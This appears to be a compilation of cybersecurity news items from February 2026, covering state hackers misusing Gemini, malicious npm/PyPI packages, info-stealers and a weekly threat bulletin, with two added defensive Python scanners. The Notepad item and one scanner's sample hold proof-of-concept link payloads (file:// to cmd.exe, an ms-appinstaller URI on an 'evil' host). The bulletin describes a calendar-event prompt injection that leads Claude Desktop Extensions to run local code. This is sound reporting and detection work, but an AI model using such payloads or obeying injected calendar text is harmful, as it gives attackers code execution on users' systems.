2026-02-13 AI Startup News

Google Reports State-Backed Hackers Using Gemini AI for Recon and Attack Support

Google on Thursday said it observed the North Korea-linked threat actor known as UNC2970 using its generative artificial intelligence (AI) model Gemini to conduct reconnaissance on its targets, as various hacking groups continue to weaponize the tool for accelerating various phases of the cyber attack life cycle, enabling information operations, and even conducting model extraction attacks. “The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News. “This actor’s target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” The tech giant’s threat intelligence team characterized this activity as a blurring of boundaries between what constitutes routine professional research and malicious reconnaissance, allowing the state-backed actor to craft tailored phishing personas and identify soft targets for initial compromise. UNC2970 is the moniker assigned to a North Korean hacking group that overlaps with a cluster that’s tracked as Lazarus Group, Diamond Sleet, and Hidden Cobra.

It’s best known for orchestrating a long-running campaign codenamed Operation Dream Job, which targets the aerospace, defense, and energy sectors with malware by approaching victims under the pretext of job openings. GTIG said UNC2970 has “consistently” focused on defense targeting and impersonating corporate recruiters in their campaigns, with the target profiling including searches for “information on major cybersecurity and defense companies and mapping specific technical job roles and salary information.” UNC2970 is far from the only threat actor to have misused Gemini to augment their capabilities and move from initial reconnaissance to active targeting at a faster clip. Some of the other hacking crews that have integrated the tool into their workflows are as follows:

- UNC6418 (Unattributed), to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses.
- Temp.HEX or Mustang Panda (China), to compile a dossier on specific individuals, including targets in Pakistan, and to gather operational and structural data on separatist organizations in various countries.
- APT31 or Judgement Panda (China), to automate the analysis of vulnerabilities and generate targeted testing plans by claiming to be a security researcher.
- APT41 (China), to extract explanations from open-source tool README.md pages, as well as troubleshoot and debug exploit code.
- UNC795 (China), to troubleshoot their code, conduct research, and develop web shells and scanners for PHP web servers.
- APT42 (Iran), to facilitate reconnaissance and targeted social engineering by crafting personas that induce engagement from the targets, as well as develop a Python-based Google Maps scraper, develop a SIM card management system in Rust, and research the use of a proof-of-concept (PoC) for a WinRAR flaw (CVE-2025-8088).

Google also said it detected a malware called HONESTCUE that leverages Gemini’s API to outsource functionality generation for the next stage, along with an AI-generated phishing kit codenamed COINBAIT that’s built using Lovable AI and masquerades as a cryptocurrency exchange for credential harvesting. Some aspects of COINBAIT-related activity have been attributed to a financially motivated threat cluster dubbed UNC5356. “HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini’s API and receives C# source code as the response,” it said. “However, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the ‘stage two’ functionality, which downloads and executes another piece of malware.” The fileless secondary stage of HONESTCUE then takes the generated C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory, thereby leaving no artifacts on disk.

Google has also called attention to a recent wave of ClickFix campaigns that leverage the public sharing feature of generative AI services to host realistic-looking instructions to fix a common computer issue and ultimately deliver information-stealing malware. The activity was flagged in December 2025 by Huntress. Lastly, the company said it identified and disrupted model extraction attacks that are aimed at systematically querying a proprietary machine learning model to extract information and build a substitute model that mirrors the target’s behavior. In a large-scale attack of this kind, Gemini was targeted by over 100,000 prompts that posed a series of questions aimed at replicating the model’s reasoning ability across a broad range of tasks in non-English languages.

Last month, Praetorian devised a PoC extraction attack where a replica model achieved an accuracy rate of 80.1% simply by sending a series of 1,000 queries to the victim’s API, recording the outputs, and training on them for 20 epochs. “Many organizations assume that keeping model weights private is sufficient protection,” security researcher Farida Shafik said. “But this creates a false sense of security. In reality, behavior is the model.

Every query-response pair is a training example for a replica. The model’s behavior is exposed through every API response.”

Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems

Cybersecurity researchers have discovered a fresh set of malicious packages across npm and the Python Package Index (PyPI) repository linked to a fake recruitment-themed campaign orchestrated by the North Korea-linked Lazarus Group. The coordinated campaign has been codenamed graphalgo in reference to the first package published in the npm registry. It’s assessed to be active since May 2025. “Developers are approached via social platforms like LinkedIn and Facebook, or through job offerings on forums like Reddit,” ReversingLabs researcher Karlo Zanki said in a report.

“The campaign includes a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges.” Notably, one of the identified npm packages, bigmathutils, attracted more than 10,000 downloads after the first, non-malicious version was published, and before the second version containing a malicious payload was released. The names of the packages are listed below:

npm: graphalgo, graphorithm, graphstruct, graphlibcore, netstruct, graphnetworkx, terminalcolor256, graphkitx, graphchain, graphflux, graphorbit, graphnet, graphhub, terminal-kleur, graphrix, bignumx, bignumberx, bignumex, bigmathex, bigmathlib, bigmathutils, graphlink, bigmathix, graphflowx

PyPI: graphalgo, graphex, graphlibx, graphdict, graphflux, graphnode, graphsync, bigpyx, bignum, bigmathex, bigmathix, bigmathutils

As with many job-focused campaigns conducted by North Korean threat actors, the attack chain begins with establishing a fake company like Veltrix Capital in the blockchain and cryptocurrency trading space, and then setting up the necessary digital real estate to create an illusion of legitimacy. This includes registering a domain and creating a related GitHub organization to host several repositories for use in coding assessments. The repositories have been found to contain projects based on Python and JavaScript.

“Examination of these repositories didn’t reveal any obvious malicious functionality,” Zanki said. “That is because the malicious functionality was not introduced directly via the job interview repositories, but indirectly – through dependencies hosted on the npm and PyPI open-source package repositories.” The idea behind setting up these repositories is to trick candidates who apply to its job listings on Reddit and Facebook Groups into running the projects on their machines, effectively installing the malicious dependency and triggering the infection. In some cases, victims are directly contacted by seemingly legitimate recruiters on LinkedIn. The packages ultimately act as a conduit to deploy a remote access trojan (RAT) that periodically fetches and executes commands from an external server.
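Because the payload arrives through a dependency rather than the repository itself, the place to look before running such a project is its lockfile or requirements file. The following is an added example, not code from ReversingLabs or the article: it checks a package-lock.json (lockfile versions 1 to 3) and a requirements.txt for the package names listed above. The function names, sample files and version strings are constructed for illustration.

```python
import json
import re

# Names exactly as listed in the article. A match is a lead for review, not
# proof: the article notes the first bigmathutils release was not malicious.
NPM_NAMES = frozenset("""
graphalgo graphorithm graphstruct graphlibcore netstruct graphnetworkx
terminalcolor256 graphkitx graphchain graphflux graphorbit graphnet graphhub
terminal-kleur graphrix bignumx bignumberx bignumex bigmathex bigmathlib
bigmathutils graphlink bigmathix graphflowx
""".split())
PYPI_NAMES = frozenset("""
graphalgo graphex graphlibx graphdict graphflux graphnode graphsync bigpyx
bignum bigmathex bigmathix bigmathutils
""".split())

REQ_NAME = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")


def normalize_pypi(name):
    """PEP 503: names are case-insensitive and runs of - _ . are equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def npm_hits(lock_text):
    """Return sorted (name, version, location) for listed names in a lockfile."""
    lock = json.loads(lock_text)
    hits = set()
    packages = lock.get("packages")
    if packages is not None:
        # lockfileVersion 2/3: flat map keyed by install path; "" is the root.
        for path, meta in packages.items():
            if path == "":
                continue
            # "name" is only present when it differs from the path (aliases).
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            if name in NPM_NAMES:
                hits.add((name, meta.get("version", "?"), path))
    else:
        # lockfileVersion 1: transitive packages are nested under "dependencies".
        def walk(deps, trail):
            for name, meta in deps.items():
                here = trail + [name]
                if name in NPM_NAMES:
                    hits.add((name, meta.get("version", "?"), " > ".join(here)))
                walk(meta.get("dependencies", {}), here)
        walk(lock.get("dependencies", {}), [])
    return sorted(hits)


def pypi_hits(requirements_text):
    """Return (line_number, normalized_name) for listed names in requirements."""
    wanted = {normalize_pypi(n) for n in PYPI_NAMES}
    hits = []
    for line_no, raw in enumerate(requirements_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment, or pip option
            continue
        match = REQ_NAME.match(line)
        if match and normalize_pypi(match.group(1)) in wanted:
            hits.append((line_no, normalize_pypi(match.group(1))))
    return hits


# Constructed sample inputs (versions are placeholders, not real releases).
SAMPLE_LOCK_V3 = json.dumps({
    "name": "interview-task", "lockfileVersion": 3,
    "packages": {
        "": {"name": "interview-task", "dependencies": {"express": "^4.18.0"}},
        "node_modules/express": {"version": "4.18.2"},
        "node_modules/kleur": {"version": "4.1.5"},
        "node_modules/bigmathutils": {"version": "0.0.0-sample"},
        "node_modules/express/node_modules/terminal-kleur":
            {"version": "0.0.0-sample"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "express": {"version": "4.18.2",
                    "dependencies": {"graphnet": {"version": "0.0.0-sample"}}},
        "lodash": {"version": "4.17.21"},
    },
})
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
BigMathUtils==0.0.0   # constructed pin
networkx>=3.0
graphex[fast]>=0.0.0
--hash=sha256:placeholder
"""

if __name__ == "__main__":
    for hit in npm_hits(SAMPLE_LOCK_V3) + npm_hits(SAMPLE_LOCK_V1):
        print("npm :", hit)
    for hit in pypi_hits(SAMPLE_REQUIREMENTS):
        print("pypi:", hit)
```

Scanning the lockfile rather than package.json matters here because a listed package can sit several levels down the dependency tree, as the nested terminal-kleur and graphnet entries in the samples show.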

The RAT supports various commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. Interestingly, the command-and-control (C2) communication is protected by a token-based mechanism to ensure that only requests with a valid token are accepted. The approach was previously observed in 2023 campaigns linked to a North Korean hacking group called Jade Sleet, which is also known as TraderTraitor or UNC4899. It essentially works like this: the packages send system data as part of a registration step to the C2 server, which responds with a token.

This token is then sent back to the C2 server in subsequent requests to establish that they are originating from an already registered infected system. “The token-based approach is a similarity […] in both cases and has not been used by other actors in malware hosted on public package repositories as far as we know,” Zanki told The Hacker News at that time. The findings show that North Korean state-sponsored threat actors continue to poison open-source ecosystems with malicious packages in hopes of stealing sensitive data and conducting financial theft, a fact evidenced by the RAT’s checks to determine if the MetaMask browser extension is installed on the machine. “Evidence suggests that this is a highly sophisticated campaign,” ReversingLabs said.

“Its modularity, long-lived nature, patience in building trust across different campaign elements, and the complexity of the multilayered and encrypted malware point to the work of a state-sponsored threat actor.”

More Malicious npm Packages Found

The disclosure comes as JFrog uncovered a sophisticated, malicious npm package called “duer-js” published by a user named “luizaearlyx.” While the library claims to be a utility to “make the console window more visible,” it harbors a Windows information stealer called Bada Stealer. It’s capable of gathering Discord tokens, passwords, cookies, and autofill data from Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser, cryptocurrency wallet details, and system information. The data is then exfiltrated to a Discord webhook, as well as the Gofile file storage service as a backup. “In addition to stealing information from the host it infected, the malicious package downloads a secondary payload,” security researcher Guy Korolevski said.

“This payload is designed to run on the Discord Desktop app startup, with self-updating capabilities, stealing directly from it, including payment methods used by the user.”

[Figure: duer-js malicious package flow, hijacking Discord’s Electron environment]

It also coincides with the discovery of another malware campaign that weaponizes npm to extort cryptocurrency payments from developers during package installation using the “npm install” command. The campaign, first recorded on February 4, 2026, has been dubbed XPACK ATTACK by OpenSourceMalware. The names of the packages, all uploaded by a user named “dev.chandra_bose,” are listed below:

xpack-per-user, xpack-per-device, xpack-sui, xpack-subscription, xpack-arc-gateway, xpack-video-submission, test-npm-style, xpack-subscription-test, testing-package-xdsfdsfsc

“Unlike traditional malware that steals credentials or executes reverse shells, this attack innovatively abuses the HTTP 402 ‘Payment Required’ status code to create a seemingly legitimate payment wall,” security researcher Paul McCarty said. “The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker’s wallet, while collecting GitHub usernames and device fingerprints.” “If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they’ve encountered malware versus what appeared to be a legitimate paywall for package access.”

ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

Threat activity this week shows one consistent signal — attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight. Another shift is how access is gained versus how it’s used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent.

The objective is less about disruption and more about staying embedded long enough to extract value. There’s also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable. Below is this week’s ThreatsDay Bulletin — a tight scan of the signals that matter, distilled into quick reads.

Each item adds context to where threat pressure is building next.

Notepad RCE via Markdown Links: Microsoft Patches Notepad Flaw

Microsoft has patched a command injection flaw (CVE-2026-20841, CVSS score: 8.8) in its Notepad app that could result in remote code execution. “Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to run remote files.

“The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with “file://” links that point to executable files (“file://C:/windows/system32/cmd.exe”) or contain special URIs (“ms-appinstaller://?source=https://evil/xxx.appx”) to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May.
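For triage of Markdown files received from outside, the link targets can be checked before the file is opened in a viewer that makes them clickable. The following is an added example, not Microsoft's fix or a vendor tool: it lists every link whose URI scheme is outside a small allowlist, which catches the “file://” and “ms-appinstaller://” forms mentioned above. The allowlist, function name and sample document are assumptions made for illustration.

```python
import re

# Assumed allowlist: schemes that open in a browser or mail client.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# Inline links and images: [text](target) or [text](<target> "title")
INLINE_LINK = re.compile(r"\[[^\]]*\]\(\s*<?([^)\s>]+)")
# Autolinks: <scheme:rest>
AUTOLINK = re.compile(r"<([A-Za-z][A-Za-z0-9+.-]*:[^>\s]+)>")
# Reference definitions: [id]: target "title"
REF_DEF = re.compile(r"^ {0,3}\[[^\]]+\]:\s*<?([^\s>]+)")
# URI scheme as defined by RFC 3986, section 3.1
SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")


def risky_links(markdown_text, allowed=ALLOWED_SCHEMES):
    """Return (line_number, scheme, target) for links outside the allowlist.

    Relative links have no scheme and are ignored. Code fences are scanned
    too, which can over-report but never hides a link. A Windows drive path
    such as C:\\tool.exe is reported with its drive letter as the scheme.
    """
    findings = []
    for line_no, line in enumerate(markdown_text.splitlines(), start=1):
        targets = []
        for pattern in (INLINE_LINK, AUTOLINK, REF_DEF):
            targets.extend(pattern.findall(line))
        seen = set()
        for target in targets:
            match = SCHEME.match(target)
            if not match:
                continue
            scheme = match.group(1).lower()  # schemes are case-insensitive
            if scheme in allowed or target in seen:
                continue
            seen.add(target)
            findings.append((line_no, scheme, target))
    return findings


# Constructed sample document; the two non-web targets are the forms quoted
# in the article, the rest is ordinary content that must not be flagged.
SAMPLE_MARKDOWN = """\
# Release notes (constructed sample)
See the [docs](https://example.com/guide) or [mail us](mailto:team@example.com).
Run the [helper](file://C:/windows/system32/cmd.exe) first.
[Install update]( MS-AppInstaller://?source=https://evil/xxx.appx )
Relative [link](./notes.md) and <https://example.org>.
[ref]: file:///C:/Users/Public/tool.exe
"""

if __name__ == "__main__":
    for line_no, scheme, target in risky_links(SAMPLE_MARKDOWN):
        print(f"line {line_no}: {scheme} -> {target}")
```

An allowlist is used instead of a blocklist because Windows registers many protocol handlers, so any scheme the reviewer does not expect is surfaced.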

APT Pressure Intensifies on Taiwan: Taiwan Becomes Target of APT Attacks

TeamT5 said it tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, out of which 173 attacks targeted Taiwan. “Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives,” the security vendor said. “Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.”

Node.js Stealer Hits Windows: LTX Stealer Targets Windows Systems

A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration.

“The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details,” CYFIRMA said.

Marco Stealer Expands Data Theft: Marco Stealer Emerges in the Wild

Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025. Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. “Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis.

In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker,” Zscaler ThreatLabz said. “Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.”

Telegram Sessions Hijacked via OAuth Abuse: Social Engineering Campaign Targets Telegram Accounts

A new account takeover campaign has been observed abusing Telegram’s native authentication workflows to obtain fully authorized user sessions. In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim’s existing session.

Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram’s official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before. “Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram’s legitimate login and authorization infrastructure,” CYFIRMA noted. “By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.”

Discord Expands Global Age Checks: Discord Announces Age Verification Plans

Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content.

Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies don’t leave a user’s device, that identity documents submitted to third-party vendors, in this case k-ID, are “deleted quickly” or “immediately” after age confirmation, and that a user’s age verification status cannot be seen by other users. However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia.

The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third-parties store personal data shared during age checks. The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that “a phased global rollout” would begin in “early March,” at which point all users globally would be defaulted to “teen-appropriate” experiences.

GuLoader Refines Evasion Tradecraft: GuLoader Continues to Evolve

A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive. First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers.

$73.6M Pig-Butchering Scam Sentence: Man Sentenced to 20 Years in Prison for Crypto Scam

Daren Li, 42, a dual national of China and St. Kitts and Nevis, has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million. Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025.

His present whereabouts are unknown. “As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services,” the U.S. Justice Department said. “The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications.” The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust.

Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds. “Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency,” the department said.

0-Click AI Prompt RCE Risk: 0-Click Flaw in Claude Desktop Extensions

A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system by a simple Google Calendar event when a user issues a harmless prompt like “Please check my latest events in google cal[endar] and then take care of it for me.” The problem stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfil user requests without enforcing proper security boundaries.

The phrase “take care of it” does the heavy lifting here, as the artificial intelligence (AI) assistant interprets it as a justification to execute arbitrary instructions embedded in those events without seeking users’ permission. The flaw impacts more than 10,000 active users and 50 DXT extensions, according to LayerX. “Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges,” the browser security company said. “As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent.

If exploited by a bad actor, even a benign prompt (‘take care of it’), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system.” Anthropic has opted not to fix the issue at this time. A similar Google Gemini prompt injection flaw was disclosed by Miggo Security last month.

Data-Theft Ransomware Surges: Coinbase Cartel Claims Over 60 Victims

A nascent ransomware group called Coinbase Cartel has claimed more than 60 victims since it first emerged in September 2025. “Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access,” Bitdefender said.

The healthcare, technology, and transportation industries represent a major chunk of Coinbase Cartel’s greatest victim demographic to date. The healthcare organizations impacted by the threat actor are primarily based in the U.A.E. Some of the other prominent groups that are focused on only data theft are World Leaks and PEAR (Pure Extraction and Ransom). The development paints a picture of an ever-evolving ransomware landscape populated by new and old actors, even as the threat is getting increasingly professionalized as attackers streamline operations.

According to data from Cyble, 6,604 ransomware attacks were recorded in 2025, up 52% from the 4,346 attacks claimed by ransomware groups in 2024.

Google Expands Privacy Takedowns: Google Adds New Options “Results about you”

Google has expanded its “Results about you” tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from search results, as well as other details like driver’s license numbers, passport numbers, and Social Security numbers. “We understand that removing existing content is only part of the solution,” Google said. “For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches.”

Monitoring Tools Used for Ransomware: Crazy Ransomware Gang Abuses Net Monitor and SimpleHelp

Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware.

The two incidents, believed to be the work of the same threat actor, took place in January and February 2026. Net Monitor comes with various capabilities that go beyond employee productivity tracking, including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation. These features, coupled with SimpleHelp’s remote access functionality, make them attractive tools for attackers looking to blend into enterprise environments without deploying traditional malware. What’s more, Net Monitor for Employees Professional bundles a pseudo-terminal (“winpty-agent.exe”) that facilitates full command execution.

Bad actors have been found to leverage this aspect to conduct reconnaissance, deliver additional payloads, and deploy secondary remote access channels, turning it into a functional remote access trojan. “In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware,” Huntress said.

0APT Victim Claims Questioned: 0APT’s 200 Victim Count Likely a Hoax

A threat actor called 0APT appears to be falsely claiming that it has breached over 200 victims within a span of a week since launching their data leak site on January 28, 2026. Further analysis has determined that the victims are a blend of wholly fabricated generic company names and recognizable organizations that threat actors have not breached, GuidePoint’s Research and Intelligence Team said.

The data leak site went offline on February 8, 2026, before resurfacing the next day with a list of more than 15 very large multinational organizations. “0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group,” security researcher Jason Baker noted. While signs suggest that the group may be bluffing about its victim count, the Windows and Linux ransomware samples have been found to be fully operational, per Halcyon. It’s worth pointing out that ransomware groups like RansomedVC have listed fabricated attacks on their data leak sites to deceive victims.

Viewed in that light, 0APT’s exaggerated claims are likely an attempt to gain visibility and momentum among its peers. Its origins remain unknown.

SYSTEM RCE via Named Pipe: Flaw in Quest Desktop Authority Detailed

A high-risk security vulnerability (CVE-2025-67813, CVSS score: 5.3) within Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. “Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network,” NetSPI said.

The named pipe implements a custom IPC protocol that supports dangerous operations, including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent.

AI Traffic Scans to Block VPNs: Russia to Analyze Internet Traffic Using AI to Flag VPN Usage

Russia’s internet watchdog will use artificial intelligence (AI) technology to analyze internet traffic and restrict the operation of VPN services, Forbes Russia reported. The Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year.

The Russian government has blocked access to tens of VPN apps in recent years. It also maintains a registry of banned websites.

Mispadu Expands Banking Attacks: Mexico and Brazil Targeted by Mispadu Trojan

Cofense said it has observed Mispadu campaigns targeting Latin America, particularly Mexico and Brazil, and to a lesser extent in Spain, Italy, and Portugal, with phishing emails containing HTML Application (HTA) attachments that are designed to bypass Secure Email Gateways (SEGs) to reach the inboxes of employees across the world. “The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself,” Cofense said.

“In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated. This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR.” Recent iterations of the banking trojan come with the ability to self-propagate on infected hosts via email and expand the target online banking websites to include banks outside of Latin America as well as cryptocurrency-based exchanges.

ScreenConnect Deployed via Phish: Phishing Campaign Delivers ConnectWise ScreenConnect for Remote Access

In a phishing campaign documented by Forcepoint, spoofed emails have been found to deliver a malicious .cmd attachment that escalates privileges, disables Windows SmartScreen, removes the mark-of-the-web (MotW) to bypass security warnings, and ultimately installs ConnectWise ScreenConnect.

The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data, including government, healthcare, and logistics companies. Recent phishing attacks have also abused web services from Amazon, like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Services (AWS) Amplify to slip past email security controls and launch credential phishing attacks. Other phishing attacks have embraced uncommon techniques like using edited versions of legitimate business emails to deliver convincingly spoofed emails to recipients. “These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails,” Cofense said.

“After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims.”

CrashFix Delivers SystemBC: CrashFix Variant Attack Delivers Python Implants and SystemBC

A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with a known malware called SystemBC. Unlike the CrashFix-style social engineering flow documented by Huntress and Microsoft, the attack stands out because it did not involve the use of a malicious browser extension. “Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix,” Binary Defense said.

“This command abused a legitimate Windows binary – finger.exe – copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload.” The PowerShell code then retrieves follow-on content, including Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, while taking steps to fingerprint the host and clean up artifacts on disk. “The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy,” the company said. “By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult.” 76 Zero-Days Found in Cars Pwn2Own Automotive 2026 Finds 76 Zero-days The third annual Pwn2Own Automotive competition held in Tokyo, Japan, late last month uncovered 76 unique zero-day vulnerabilities in a variety of targets, such as in-vehicle infotainment (IVI) systems (Tesla), electric vehicle (EV) chargers (Alpitronic HYC50, ChargePoint Home Flex), and car operating systems (Automotive Grade Linux).

Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synactiv with $85,000. Bing Ads Funnel Tech Scams Fake Bing Ads Leak to Tech Support Scams Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage. The campaign targeted healthcare, manufacturing, and technology sectors in the U.S. “Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site,” Netskope Threat Labs said .

Chinese VPN Infra Footprint Expands Chinese VPN Used by Devices in Russia, China, Myanmar, Iran, and Venezuela A Chinese virtual private network (VPN) provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. It also has an Android app that’s directly hosted on its website (“lvcha[.]in”) and distributed via the Google Play Store . Further analysis of the domain has uncovered a cluster of nearly 50 suspicious domains, all of which promote the same VPN. “Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution,” Silent Push said .

Grid Attack Triggers Western Alerts U.K. and U.S. Issues Warning After Poland Energy Grid Cyber Attack Following a late December 2025 coordinated cyber attack on Poland’s power grid , the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators.

